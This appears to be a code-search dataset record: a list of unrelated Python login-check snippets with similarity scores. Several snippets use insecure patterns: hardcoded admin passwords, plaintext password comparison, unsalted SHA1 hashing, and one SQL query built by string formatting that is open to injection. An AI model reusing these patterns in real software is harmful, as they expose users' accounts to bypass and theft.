[ "def check_user_and_login(self) -> Response:\n pass", "def is_correct_user(self, login, password):\n pass", "def check_user_logged():\n global user\n if 'user' not in session:\n return False\n else:\n user = session.get('user')\n return user['username'] != ''", "def logged():\n if session.login==1:\n return True\n else:\n return False", "def check_login(request, username=None):\r\n if request.user is None:\r\n return False\r\n\r\n # if we have a username we're told to check against, make sure the\r\n # username matches\r\n if username is not None and username != request.user.username:\r\n return False\r\n\r\n return True", "def is_logged_in():\n return 'user' in session", "def check_user(self,username, password):\n safe_input = (username, password)\n vals = self.cur.execute(\"SELECT Username, Password FROM Users WHERE Username=? AND Password=?\",safe_input).fetchone()\n if vals:\n logging.info('%s was authenticated', username)\n return True\n else:\n logging.info('Failed login for %s', username)\n return False", "def login_user():\n pass", "def check_user(self):\n try:\n if (self.get_user()[0][0] == self.username) and (self.check_password(self.password)):\n return True\n else:\n return False\n except:\n return False", "def check_login(self, u, p):\r\n\t\tlogger.debug(\"Entering\")\r\n\t\t\r\n\t\ttry:\r\n\t\t\tval = login.validate_user(u, p)\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, e.message\r\n\t\t\r\n\t\tif val:\r\n\t\t\tlogger.debug(\"Exiting - success\")\r\n\t\t\treturn True, \"Login successful!\"\r\n\t\telse:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, \"Login failed.\"", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def login():", "def login():", "def checkLogin():\n if 'access_token' in login_session:\n return True\n else:\n return False", "def verifyLogin():\n global HUB\n\n loginInfo = FloatingTools.userData()['Login']\n if loginInfo['username'] is None or loginInfo['password'] is None:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False\n try:\n HUB = Github(loginInfo['username'], loginInfo['password'])\n for repo in HUB.get_user().get_repos():\n break\n FloatingTools.Dashboard.setDashboardVariable('logged_in', True)\n return True\n except BadCredentialsException:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False", "def require_login(self):\n\tif users.get_current_user():\n\t return True\n\telse:\n\t self.redirect(users.create_login_url(self.request.uri))\n\t return False", "def validate_login(self, username, password):\n user = User(self).get(username)\n return user and user['Password'] == password", "def check_auth():", "def check_login(self):\n # read token first\n user_data = self.storage.get_user_data(self.user_id)\n if not \"token\" in user_data:\n sys.exit(\"SEPIA account: No user data found! 
Please generate a token first (python -m sepia.account --id=[sepia-user-id] --host=[sepia-server-url]).\")\n\n # check token\n token = user_data[\"token\"]\n url = self.host_address + \"/assist/authentication\"\n payload = {\n 'action' : \"check\",\n 'client' : self.client_info,\n 'KEY' : (self.user_id + \";\" + token)\n }\n headers = {\n 'Content-Type': \"application/json\"\n }\n response = requests.request(\"POST\", url, json=payload, headers=headers)\n try:\n res = json.loads(response.text)\n except NameError:\n res = None\n\n if res[\"result\"] and res[\"result\"] == \"success\":\n name = res[\"user_name\"][\"nick\"] or res[\"user_name\"][\"first\"]\n print(\"SEPIA account: Success - Wb \" + name + \", your login token is still valid.\")\n else:\n print(\"SEPIA account: Failed - I think the token is invalid or we got connection problems.\")", "def isLoggedIn(self):\n session = self.getSession()\n if session is not None:\n return True\n return False", "def test_user_login_attempt_when_user_already_logged_in(self):\n\t\tpass", "def logged_in(browser: RoboBrowser):\n login_div = browser.find('div', content=\"Login\")\n return True if not login_div else False", "def user_in_session():\n return 'user_id' in login_session", "def login_check(self, username, password):\n can_login, msg = self.db.check_login(username, password)\n self.send_message(str(can_login) + DOLLAR + msg)", "def check_my_users(user):\n user_data = my_users.get(user['username'])\n if not user_data:\n return False # <--- invalid credentials\n elif user_data.get('password') == user['password']:\n return True # <--- user is logged in!\n\n return False # <--- invalid credentials", "def is_logged_in(session):\n return 'user' in session", "def __check_user_exist(self):\n\n login_form = self.login_form()\n\n user = User.query.filter_by(username=login_form.username.data).first()\n if user is None or not user.get_password(login_form.password.data):\n flash('Invalid username or password') # TODO: flash in Template hinzufuegen\n return redirect(url_for('login'))\n\n login_user(user, remember=login_form.remember_me.data)\n\n next_page = request.args.get('next')\n\n # if 'next' is found and the host is specified\n # it will redirect\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n\n return redirect(next_page)", "def loginState(self, user_data):\n\t\tif self.db.request(\"getOne\", user_data):\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def check_user(used_name, used_password):\n user_exists = UserData.user_login(used_name, used_password)\n\n return user_exists", "def log_in(user_name,password):\n log_in == User.log_in(user_name,password)\n if log_in != False:\n return User.log_in(user_name,password)", "def is_logged_in(self, params):\n email = self.credentials.get('email', '')\n password = self.credentials.get('password', '')\n if email != '' and password != '':\n return False\n return self.netflix_session.is_logged_in(account=self.credentials)", "def logged_in():\n\n if current_user.is_authenticated:\n return True\n\n return False", "def check_user(self, login, password):\n user = self.cursor.execute(\n '''SELECT * FROM users WHERE login = ?''', login).fetchone()\n if user is not None:\n if user[3] == password:\n return Message('response', 'User exists')\n else:\n return Message('response',\n 'Users exists. 
Check password')\n else:\n return Message('response', 'User does not exists')", "def login(uname, password, db, session):\n\tquery = db((db.User.username == uname) & (db.User.password == password))\n\tif query.count() == 1:\n\t\tsession.auth = query.select().first().id\n\t\treturn True\n\telse:\n\t\treturn False", "def is_logged_in(self, login_url: str) -> bool:\n self.d('Check login - %s', login_url)\n if not login_url:\n return False\n res = self.get(login_url, allow_redirects=False)\n if res.status_code == 302:\n self.i('Is logged in')\n return True\n self.i('Is not logged in')\n return False", "def _login(self):\n if User.login(self.session.teller_id, self.session.teller_pin, 'teller'):\n return True\n else:\n self.session.output({'authentication_failure': 'wrong ID or PIN\\n'}, '[ Login failed ]')\n return False", "def login_user(username,password):\n \n check_user = Records.verify_user(username,password)\n return check_user", "def validUser(self):\n if self.state == SessionStates.LOGGED_OUT:\n return False\n\n # if self.user == None:\n # return False\n return True", "def CheckLogin(self) :\n url = Judge.UrlStatus + 'contestId=1&search=true&firstId=-1&lastId=-1&handle=' + self.username\n logging.info(\"open_url %s\" % url)\n req = urllib2.Request(url, headers=Judge.Headers)\n rsp = self.opener.open(req)\n res = None\n if rsp :\n res = rsp.read()\n #wf(\"CheckLogin_\", res)\n result = self.__parse_result(None, res, need_extra_info=False)\n if result and result.has_key('origin_runid') :\n #print \"CheckLogin last_submit_time{%s}END\" % result['_submit_time']\n self.last_runid = result['origin_runid']\n return res and res.find(r'<a href=\"/onlinejudge/login.do\">Login</a>') == -1", "def is_logged_in():\n _has_cookie = util.web.has_cookie('pass')\n if _has_cookie:\n _is_expired = util.web.is_cookie_expired('pass')\n if _is_expired:\n return False\n return True\n return False", "def valid_login(username: str, password: str):\n\n try:\n LoginHandler.login(username, password)\n global validLogin\n validLogin = True\n except:\n validLogin = False", "def check_if_should_always_be_logged_in(connection,username_log):\r\n with connection:\r\n c = connection.execute(SELECT_USER_BY_LOGIN_PREVILAGES, (username_log,))\r\n return c.fetchone()", "def login():\n pass", "def user_auth(request):\n if request.user.is_authenticated:\n user = User.objects.get(email=request.user.email)\n if UserInformation.objects.filter(user=user).exists():\n return True\n return False", "def is_logged_in(self) -> bool:\n return self.id is not None and self.username is not None", "def check_authentication():\r\n\r\n #TODO: Reservation based authentication\r\n try:\r\n authenticated_user()\r\n except Exception as e:\r\n return e\r\n\r\n return True", "def is_logged_in() -> bool:\n is_dev_login_disabled = SETTINGS.DEV_LOGIN_DISABLED and is_localhost()\n return bool(is_dev_login_disabled or is_logged_in_user())", "def check_user(self):\n try:\n if self.get_customer()[0][0] == self.dni:\n return True\n else:\n return False\n except:\n return False", "def check(self):\n\n us = ServiceLocator.resolve(ServiceLocator.USERS)\n\n user_session = self.get()\n user = self.get_user()\n\n return user is not None and us.verify_auth_token(user_session.token, config.SESSION_EXPIRES)", "def check_auth(username, password):\n # return username == app.config['USER'] and password == app.config['PASS']\n\n return username == app.config['USER'] and password == app.config['PASS']", "def is_logged_in(self):\n return self.router.token is not None", 
"def test_user_can_login(self):\n user = authenticate(username='Marry', password='secret')\n self.assertFalse(user is None)\n self.assertTrue(user.is_authenticated)", "def _check_auth(self):\n if self.authToken:\n return True\n else:\n msg = \"you need to login\"\n self.raise_error(msg)", "def is_logged_in():\n logged_in = \"uid\" in session\n if logged_in:\n user = api.user.get_user(uid=session[\"uid\"])\n if not user or (user.get(\"disabled\", False) is True):\n logout()\n return False\n return logged_in", "def user_exists(self, login):\n\t\tif login in self.users_by_name and isinstance(self.users_by_name[login], VDOM_user):\n\t\t\treturn True\n\t\treturn False", "def check_auth(username, password):\r\n return username == current_app.config['ADMIN_USERNAME'] \\\r\n and password == current_app.config['ADMIN_PASSWORD']", "def CheckLogin(self):\n \n username = self.username.get().lstrip().rstrip()\n if not username:\n messagebox.showerror('Error', 'No username entered.')\n return False, None, None\n \n password = self.password.get().lstrip().rstrip()\n if not password:\n messagebox.showerror('Error', 'No password entered.')\n return False, None, None\n \n for user in self.user_db:\n if user['User'] == username:\n if user['Password'] == password:\n # Retrive the last log-in date, then update value to now\n prev_login = user['LastLogIn']\n user['LastLogIn'] = date.today().strftime('%B %d, %Y')\n return True, username, prev_login\n else:\n messagebox.showerror('Error',\n 'The provided password is incorrect.')\n return False, None, None\n \n messagebox.showerror('Error', f'User {username} does not exist.')\n return False, None, None", "def test_func(self):\n if not self.request.user.is_authenticated:\n return False\n if self.request.user.is_staff:\n return True\n return self.get_user() == self.request.user", "def is_logged_in(self, email):\n wait_for_element(self.browser, self.expand_left_panel)\n expand_panel = self.browser.find_element(*self.expand_left_panel)\n custom_click(self.browser, expand_panel)\n wait_for(lambda: len(self.browser.find_element(*self.logged_user).text) > 0, delay=1, num_sec=5)\n user_logged_in = self.browser.find_element(*self.logged_user).text\n if user_logged_in == email:\n return True\n else:\n raise Exception('Failed to login by user => {}'.format(email))", "def login(self, returnToURL):\r\n\t\tif not self.request().hasValue('userId') or \\\r\n\t\t\tnot self.request().hasValue('password'):\r\n\t\t\tself.response().sendRedirect('/nova/login.psp?returnToURL=%s' % returnToURL)\r\n\t\t\treturn 0\r\n\t\treturn 1", "def logged_in(request):\n return request.current_user is not None", "def check_login_response(self, response):\n\t\tprint(response.body)\n\t\tif login_error[0] not in response.body.decode('utf-8'):\n\t\t self.log(\"Successfully logged in. 
Let's start crawling!\")\n\t\t # Now the crawling can begin..\n\t\t return self.initialized()\n\t\t print(\"logged in\")\n\t\telse:\n\t\t self.log(\"Bad times :(\")\n\t\t # Something went wrong, we couldn't log in, so nothing happens.", "def login_check():\n\n user_email = request.form['email']\n user_password = request.form['password']\n\n # Check user info against database\n email_query = User.query.filter_by(email=user_email).first()\n if email_query == None:\n flash('Invalid email or password')\n return redirect('/')\n\n # Get user's id using email\n user_id = email_query.user_id\n\n # Valid user password\n if user_password == email_query.password:\n #create user session\n session['user'] = email_query.user_id\n return redirect('/user-%s' % user_id)\n else:\n flash('Invalid email or password')\n return redirect('/')", "def login_to_system(credentials):\n return True if credentials else False", "def validate_login(self, request):\n\n if 'id' not in request.session or 'steam_id' not in request.session:\n raise PermissionDenied('You need to login')\n\n # if self.mode9:\n # if 'team' not in PlayerList[request.session['id']]:\n # raise PermissionDenied('Player is not in a team!')", "def validarLogin(self, usuario, senha):\r\n try:\r\n if usuario is not None and senha is not None:\r\n self.cursor.execute(\"SELECT SENHA FROM LOGIN WHERE USUARIO = '%s';\" %(usuario))\r\n self.__temp = self.cursor.fetchone()\r\n if self.__temp[0] == senha:\r\n return True\r\n return False\r\n except:\r\n return False", "def login_form_valid(self, form):\n self.request.session.update({\n 'user_is_none': None,\n 'user_is_active': None\n })\n\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n user = authenticate(email=email, password=password)\n\n if user is None:\n self.request.session['user_is_none'] = True\n return HttpResponseRedirect('/user_account/')\n elif user.active is False:\n self.request.session['user_is_active'] = False\n return HttpResponseRedirect('/user_account/')\n else:\n self.request.session.update({\n 'user_is_none': False,\n 'user_is_active': True\n })\n login(self.request, user)\n return HttpResponseRedirect('/schedule/')", "def default_login_works(self):\n return True if self.default_login_auth_header else False", "def check_auth(username, password):\n return get_ct_object(username, password) is not None", "def test_can_login(self):\n user = authenticate(username='jack', password='secret')\n self.assertTrue(user is not None)\n self.assertTrue(user.is_authenticated)", "def is_valid_login(self, username, password):\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_IS_LOGIN_INFORMATION_VALID, username + '|' + password)", "def check_auth(username, password):\n return username == 'asimov' and password == 'tagada72'", "def login(self):\n\t\treturn", "def is_registered(self):\n if self.user == getpass.getuser():\n return True\n else:\n return False", "def is_logged_in_user_valid(user_name, password):\n if user_name.upper() == \"HELLO\" and password == \"World\":\n return True # User input matches user name and password.\n else:\n return False # User input does not match user name and password.s", "def check_login_status(self):\n\n if (hasattr(self, 'username') and hasattr(self, 'password')\n and hasattr(self, 'session')):\n authenticated = self._request('POST', CosmoSim.QUERY_URL,\n auth=(self.username, self.password),\n cache=False)\n if authenticated.status_code == 200:\n warnings.warn(\"Status: You are logged in as {0}.\"\n .format(self.username))\n 
soup = BeautifulSoup(authenticated.content, \"lxml\")\n self.delete_job(jobid=str(soup.find(\"uws:jobref\")[\"id\"]),\n squash=True)\n else:\n warnings.warn(\"Status: The username/password combination \"\n \"for {0} appears to be incorrect.\"\n .format(self.username))\n warnings.warn(\"Please re-attempt to login with your cosmosim \"\n \"credentials.\")\n else:\n warnings.warn(\"Status: You are not logged in.\")", "def is_logged_in(self, username):\n if username in self.users:\n return self.users[username].is_logged\n return False", "def logged_in(self):\n return self.user is not None", "def is_authenticated(self):\n result = self.lpass(\"lpass status\")\n\n if \"Logged in as\" in result.output:\n return True\n\n return False", "def check_user(self, username):\n self.dbcursor.execute(self.SQL_CHECK_USER, [username])\n row = self.dbcursor.fetchone()\n if row:\n return True \n return False", "def check_user(self, username):\n self.dbcursor.execute(self.SQL_CHECK_USER, [username])\n row = self.dbcursor.fetchone()\n if row:\n return True \n return False", "def _logged_in_successful(data):\r\n if re.match(r'^:(testserver\\.local|tmi\\.twitch\\.tv)'\r\n r' NOTICE \\* :'\r\n r'(Login unsuccessful|Error logging in)*$',\r\n data.strip()):\r\n return False\r\n else:\r\n return True", "def is_logged_in(session):\n if 'tid' in session:\n return {'success': 1, 'message': '你处于登录状态.', \n 'teamname': session['teamname'], 'is_zju_user': session['is_zju_user']}\n else:\n return {\"success\": 0, \"message\": \"你并未处于登录状态.\"}", "def is_regular_user(user):\n return user.is_authenticated()", "def login(self):", "def check_auth(username, password):\n return username == 'admin' and password == 'worcester'", "def check_auth(username, password):\n return username == app.config['USERNAME'] and (\n password == app.config['PASSWORD'])", "def login(UserID, Password):\n\tif UserID in USERS and USERS[UserID] == Password:\n\t\treturn True\n\telse:\n\t\treturn False", "def is_logged_in(self):\n return self.cookie is not None", "def check_auth(username, password):\n return username == 'admin' and password == 'admin'", "def check_auth(username, password):\n return (username == app.config['USERNAME'] and\n password == app.config['PASSWORD'])", "def check_auth(username, password):\n return username == USERNAME and password == PASSWORD", "def check_auth(username, password):\n return username == 'jeffkoons' and password == 'likesweirdbaloons'", "def checkLogin(self):\n if self._thread:\n return False\n\n try:\n return self._checkLogin()\n except Exception:\n self.expired = True\n self.finished = True\n\n return False", "def check_login(db, useremail, password):\n import hashlib\n\n cursor = db.cursor().execute('SELECT password FROM users WHERE email IS ?', [useremail])\n result = cursor.fetchone()\n if result:\n return result[0] == hashlib.sha1(password.encode()).hexdigest()\n return False", "def check_auth(username, password):\n return username == 'admin' and password == 'password'", "def _can_login(self):\n return all([self.user.is_active, self.status, self.status_detail == \"active\"])", "def do_login():\n\n isTeacher = False\n\n # check if this_user is admin or normal user\n this_user = User.query.filter_by(username=request.form['username']).first()\n \n # is this_user is not student or admin then check teacher table\n if this_user is None:\n this_user = Teacher.query.filter_by(username=request.form['username']).first()\n isTeacher = True\n\n # if this_user is still none -> invalid user\n if this_user is not None:\n if 
this_user.password == request.form[\"password\"]:\n session['authenticated'] = True\n session['username'] = this_user.username\n session['name'] = this_user.name\n session['isTeacher'] = isTeacher\n if session['username'] == \"admin\":\n session['wasAt'] = \"manageusers\"\n try:\n session['cpi'] = this_user.cpi\n session['grp_size'] = this_user.group_size\n except:\n pass\n else:\n flash(\"Incorrect Password, Please Try Again\") \n else:\n flash(\"Invalid Username, Please Try Again\")\n return home()", "def check_auth(username, password):\n return username == 'admin' and password == 'Passw0rd'", "def check_auth(username, password):\n return username == 'admin' and password == 'root'", "def acctLogin(self):\n loggedIn = False\n if self.acctObj.login():\n loggedIn = True\n else:\n logger.warning(\"{} Authentication failed\".format(self))\n self.acctObj = None\n\n if loggedIn:\n return True\n return False" ]
[ "0.8381395", "0.8055585", "0.7813263", "0.7678583", "0.7649151", "0.7576734", "0.7567418", "0.7521423", "0.75094885", "0.7488563", "0.74643886", "0.7460811", "0.7460811", "0.7443086", "0.7417814", "0.74102914", "0.7391327", "0.73445153", "0.73423046", "0.72956836", "0.7277331", "0.72458184", "0.7244352", "0.724247", "0.723785", "0.7231149", "0.72120786", "0.7196707", "0.71806514", "0.71768206", "0.7166374", "0.7160414", "0.7157582", "0.71544594", "0.7114222", "0.7111135", "0.71090746", "0.70937395", "0.70930314", "0.7076667", "0.7073319", "0.7061583", "0.70432377", "0.7025321", "0.70132774", "0.7009884", "0.6997237", "0.6990148", "0.69825286", "0.6976101", "0.69747275", "0.695906", "0.6944757", "0.69443876", "0.6941434", "0.69339997", "0.69278216", "0.6924908", "0.6917136", "0.691316", "0.6908974", "0.6903402", "0.6894987", "0.68923765", "0.6886722", "0.6878631", "0.6870336", "0.68470937", "0.68447274", "0.6842939", "0.68408334", "0.6840231", "0.68296224", "0.68287593", "0.68269473", "0.6823845", "0.68073136", "0.6806805", "0.68049407", "0.6797839", "0.6797839", "0.6796853", "0.67956036", "0.67931885", "0.679113", "0.6784908", "0.6784704", "0.67844296", "0.6783589", "0.67728573", "0.6772496", "0.67714155", "0.6767632", "0.675321", "0.675311", "0.6749905", "0.67493784", "0.6744074", "0.6741154", "0.6737048", "0.6733501" ]
0.0
-1
Check if mobile user login
def require_mobile_user(func): @wraps(func) def decorator(*args, **kwargs): if not g.user: return redirect(url_for('wechat.signin')) return func(*args, **kwargs) return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_mobile(request):\n MOBILE_AGENT_RE=re.compile(r\".*(iphone|mobile|androidtouch)\",re.IGNORECASE)\n\n if MOBILE_AGENT_RE.match(request.META['HTTP_USER_AGENT']):\n return True\n else:\n return False", "def mobile(request):\n MOBILE_AGENT_RE = re.compile(\n r\".*(iphone|mobile|androidtouch)\", re.IGNORECASE)\n if MOBILE_AGENT_RE.match(request.META['HTTP_USER_AGENT']):\n return True\n else:\n return False", "def _login(self):\n if User.login(self.session.teller_id, self.session.teller_pin, 'teller'):\n return True\n else:\n self.session.output({'authentication_failure': 'wrong ID or PIN\\n'}, '[ Login failed ]')\n return False", "def is_mobile(request_object):\n \n return utilities.is_mobile(request_object)", "def checkLogin():\n if 'access_token' in login_session:\n return True\n else:\n return False", "def omm_login():\r\n msg, status = \"\", True\r\n try:\r\n if g.platform == 'android':\r\n sleep(5)\r\n 'Enters value in password text box based on the user inputs'\r\n flag1 = ui_controls.text_box(get_obj_identifier('login_enterPassword_txt'), value=g.password)\r\n sleep(3)\r\n 'Clicks on the login button'\r\n flag2 = ui_controls.button(get_obj_identifier('login_createPasswordLogin_btn'))\r\n \r\n status = False if not (flag1 and flag2) else True\r\n else: \r\n 'Enters value in password text box based on the user inputs'\r\n flag1 = ui_controls.setValue(get_obj_identifier('login_enterPassword_txt'), value=g.password)\r\n\r\n 'Clicks on the login button'\r\n flag2 = ui_controls.button(get_obj_identifier('login_btn'))\r\n \r\n status = False if not (flag1 and flag2) else True\r\n \r\n except Exception as excp:\r\n traceback.print_exc()\r\n msg += str(excp)\r\n status = False\r\n return status, msg", "def check_user_and_login(self) -> Response:\n pass", "def set_mobile_session(id_token):\n try:\n user = google.oauth2.id_token.verify_oauth2_token(id_token, requests.Request())\n return True, user['name'].replace(' ', '_')\n except ValueError:\n raise exceptions.TokenExpired()", "def logged_in(browser: RoboBrowser):\n login_div = browser.find('div', content=\"Login\")\n return True if not login_div else False", "def is_correct_user(self, login, password):\n pass", "def login():\r\n if not request.is_json or 'phone_number' not in request.get_json() or 'password' not in request.get_json():\r\n return bad_request('Missing required data.')\r\n return login_user(request)", "def phone_mobile(self, instance):\r\n return instance.user.profile.phone_mobile", "def is_integrated(user):\n if user.is_authenticated() and user.is_active:\n return NokiaUser.objects.filter(user=user).exists()\n return False", "def login_mobile(request):\n\n email = request.POST['email'].lower()\n pin = hashlib.sha224(request.POST['pin']).hexdigest()\n user = authenticate(username=email, pin=pin)\n if user is not None:\n login(request, user)\n logger.debug( \"User %s authenticated and logged in\"%email )\n exp_group = user.experiment.id\n # log latitude and longitude\n if 'lat' in request.POST:\n event = Event(user=user, action=Event.LOGIN, latitude=float(request.POST['lat']), longitude=float(request.POST['lon']))\n event.save()\n return JSONHttpResponse({'result': '1', 'experiment': str(exp_group), 'first_name': str(user.first_name)}) \n else:\n return JSONHttpResponse({'result': '-1'})\n\n\n # TODO: if basic login, send to Home\n # if group purchase alert, send to that specific group purchase info\n # if price down alert, send to the item \n return JSONHttpResponse()", "def check_auth():", "def 
otp_is_verified(request):\n auth = JSONWebTokenAuthentication()\n jwt_value = auth.get_jwt_value(request)\n if jwt_value is None:\n return False\n\n payload = jwt_decode_handler(jwt_value)\n persistent_id = payload.get('otp_device_id')\n\n if persistent_id:\n device = Device.from_persistent_id(persistent_id)\n if device is not None and device.user_id != request.user.id:\n return False\n # Valid device in JWT\n return True\n return False", "def detect_login(soup):\n \n main = soup.find(id='main')\n notice = main.find(class_='notice')\n for c in notice.children:\n if c.name == 'div':\n if c.has_attr('class') and 'formulaire_login' in c['class']:\n return True\n \n return False", "def log_in(self):\n print('-=' * 12 + \" Log in \" + '-=' * 12)\n mob_num, password = self._input_mob_num('Mobile Number :'), input(\"Password: \")\n self._user = self.auth.log_in(mob_num, password)\n if self._user:\n print(\"you are logged in, Welcome '{}'\".format(self._user.username))\n self.homepage()\n else:\n print(\"Mobile number or/and password is/are Invaild \\n\" + '-=' * 30)\n options = {1: self.log_in, 2: self.logging_page, 3: self.exit}\n print_out = \"(1) Try Again \\n (2) Back to Logging Page \\n (3) Exit\"\n self._take_option(options, print_out)", "def login(request):\n data = {}\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n mob_no = form.cleaned_data.get('mob_no')\n password = form.cleaned_data.get('password')\n u_obj = Login.objects.filter(mobile_number=mob_no,\n password=password)\n if u_obj:\n data['success']=1\n data['message']='login successful'\n return JsonResponse(data)\n else:\n data['success']=0\n data['message']='login error'\n return JsonResponse(data)\n else:\n form = LoginForm()\n return render(request, 'login/login.html',\n {'form':form,})", "def check_mobile(data):\n\n firebase_uid = data['session'].split('/')[-1]\n db = firebase.database()\n follow_up_event = \"continue_house\"\n mobile = db.child(\"user_data\").child(firebase_uid).child(\"Mobile Number\").get().val()\n try:\n origin = data[\"queryResult\"][\"fulfillmentMessages\"][1][\"payload\"][\"origin\"]\n if origin == \"confirmedCall\":\n follow_up_event = \"continue_call\"\n except:\n pass\n if mobile == \"0\" or mobile is None:\n print(\"Mobile number not found.\")\n response = {\n \"followupEventInput\": {\n \"name\": \"request_mobile\",\n \"languageCode\": \"en-US\"\n }}\n else:\n print(\"Mobile number found: \" + mobile)\n response = {\n \"followupEventInput\": {\n \"name\": follow_up_event,\n \"languageCode\": \"en-US\"\n }\n }\n return response", "def login_to_system(credentials):\n return True if credentials else False", "def loginState(self, user_data):\n\t\tif self.db.request(\"getOne\", user_data):\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def user_in_session():\n return 'user_id' in login_session", "def verifyLogin():\n global HUB\n\n loginInfo = FloatingTools.userData()['Login']\n if loginInfo['username'] is None or loginInfo['password'] is None:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False\n try:\n HUB = Github(loginInfo['username'], loginInfo['password'])\n for repo in HUB.get_user().get_repos():\n break\n FloatingTools.Dashboard.setDashboardVariable('logged_in', True)\n return True\n except BadCredentialsException:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False", "def _logged_in_successful(data):\r\n if re.match(r'^:(testserver\\.local|tmi\\.twitch\\.tv)'\r\n r' NOTICE \\* :'\r\n 
r'(Login unsuccessful|Error logging in)*$',\r\n data.strip()):\r\n return False\r\n else:\r\n return True", "def login_user():\n pass", "def check_user(self):\n try:\n if self.get_customer()[0][0] == self.dni:\n return True\n else:\n return False\n except:\n return False", "def check_login(self):\n # read token first\n user_data = self.storage.get_user_data(self.user_id)\n if not \"token\" in user_data:\n sys.exit(\"SEPIA account: No user data found! Please generate a token first (python -m sepia.account --id=[sepia-user-id] --host=[sepia-server-url]).\")\n\n # check token\n token = user_data[\"token\"]\n url = self.host_address + \"/assist/authentication\"\n payload = {\n 'action' : \"check\",\n 'client' : self.client_info,\n 'KEY' : (self.user_id + \";\" + token)\n }\n headers = {\n 'Content-Type': \"application/json\"\n }\n response = requests.request(\"POST\", url, json=payload, headers=headers)\n try:\n res = json.loads(response.text)\n except NameError:\n res = None\n\n if res[\"result\"] and res[\"result\"] == \"success\":\n name = res[\"user_name\"][\"nick\"] or res[\"user_name\"][\"first\"]\n print(\"SEPIA account: Success - Wb \" + name + \", your login token is still valid.\")\n else:\n print(\"SEPIA account: Failed - I think the token is invalid or we got connection problems.\")", "def _check_user_pass(self):\n if not self.username:\n self.username = input(' 请输入手机号:')\n if self.username.isdigit() and '+86' not in self.username:\n self.username = '+86' + self.username\n\n if not self.password:\n self.password = input(' 请输入密码:')", "def user_login():\n \n data = user_obj.user_login()\n return data", "async def check_authenticated(self):\n\n def function():\n return self._api.request(\"user\", \"getdevice\", version=\"v2\")\n\n return await self.call(function)", "def is_logged_in(self, email):\n wait_for_element(self.browser, self.expand_left_panel)\n expand_panel = self.browser.find_element(*self.expand_left_panel)\n custom_click(self.browser, expand_panel)\n wait_for(lambda: len(self.browser.find_element(*self.logged_user).text) > 0, delay=1, num_sec=5)\n user_logged_in = self.browser.find_element(*self.logged_user).text\n if user_logged_in == email:\n return True\n else:\n raise Exception('Failed to login by user => {}'.format(email))", "def user_auth(request):\n if request.user.is_authenticated:\n user = User.objects.get(email=request.user.email)\n if UserInformation.objects.filter(user=user).exists():\n return True\n return False", "def i_am_in_the_login_page(browser):", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def logged():\n if session.login==1:\n return True\n else:\n return False", "def is_logged_in(self, params):\n email = self.credentials.get('email', '')\n password = self.credentials.get('password', '')\n if email != '' and password != '':\n return False\n return self.netflix_session.is_logged_in(account=self.credentials)", "def username(provider, username):\n\n if provider == 'alditalk':\n if username.isdigit(): # only mobile number\n return True\n else:\n return False\n elif provider == 'netzclub': # mobile number and email\n if ((username.isdigit()) or (\"@\" in username)):\n return True\n else:\n return False\n elif provider == 'congstar':\n return True", "def is_logged_in() -> bool:\n is_dev_login_disabled = SETTINGS.DEV_LOGIN_DISABLED and is_localhost()\n return bool(is_dev_login_disabled or is_logged_in_user())", "def login():", "def login():", "def login_check(self, username, password):\n can_login, msg = 
self.db.check_login(username, password)\n self.send_message(str(can_login) + DOLLAR + msg)", "def save_login(mobile):\n mobile = Mobile(mobile)\n ktt = KTT(mobile)\n ktt.gen_device_code()\n ktt.get_api_start()\n time.sleep(4)\n ktt.post_login()\n time.sleep(4)\n ktt.get_user_info()\n user_info = (\n ktt.user_info[\"uid\"], ktt.user_info[\"name\"], ktt.user_info[\"mobile\"],\n ktt.user_info[\"father\"], ktt.user_info[\"balance\"], ktt.user_info[\"coin\"],\n ktt.device_code, ktt.token, ktt.mobile.os, ktt.mobile.brand, ktt.mobile.mac,\n ktt.mobile.android_id\n )\n print(user_info)\n\n # save one user info record and one user flag\n uis.save([user_info])\n read_flag = [(user_info[0],)]\n uis.save_flag(read_flag)", "def is_logged_in():\n return 'user' in session", "def login_web_required(view_func):\r\n @wraps(view_func, assigned=available_attrs(view_func))\r\n def _wrapped_view_func(request, *args, **kwargs):\r\n if hasattr(request, \"session\") and request.session.get('is_logon', False) and request.user.is_active:\r\n return view_func(request, *args, **kwargs)\r\n else:\r\n return HttpResponse(FailResponse(u'请先登录'))\r\n return _wrapped_view_func", "def is_logged_in(self):\n return self.router.token is not None", "def login_auto(token: Token, mac_address: str) -> bool:\n device = Device.get_by_mac(mac_address)\n fail_msg = \"\"\n if device is None:\n fail_msg = \"No device with mac address exist\"\n elif Token.is_token_expired(device.token_expires):\n fail_msg = \"Token is expired\"\n elif token != device.token:\n fail_msg = \"Wrong token\"\n if fail_msg:\n client_logger_security().info(f\"Failed to login automatically: {fail_msg}\")\n return False\n else:\n _set_user_authenticated(device.user_id, device.device_id)\n client_logger_security().info(f\"Successfully logged in automatically: device_id={device.device_id}, \"\n f\"user_id={device.user_id}\")\n return True", "def check_user(cls, user):\n if user.mobile_phone and cls.contains_number(user.mobile_phone):\n return True\n\n if user.add_mobile_phone and cls.contains_number(user.add_mobile_phone):\n return True\n\n if user.landline_phone and cls.contains_number(user.landline_phone):\n return True\n\n if user.add_landline_phone and cls.contains_number(user.add_landline_phone):\n return True\n\n return False", "def if_user_isback_update_login_session(connection,user):\r\n with connection:\r\n return connection.execute(UPDATE_USER_LOGIN_STATUS_TO_TRUE, (user,))", "def check_user_logged():\n global user\n if 'user' not in session:\n return False\n else:\n user = session.get('user')\n return user['username'] != ''", "def login(self):\n url = self._root + self._routes[\"login\"]\n self.r = self.reqsession.get(url) \n if self.r.url == 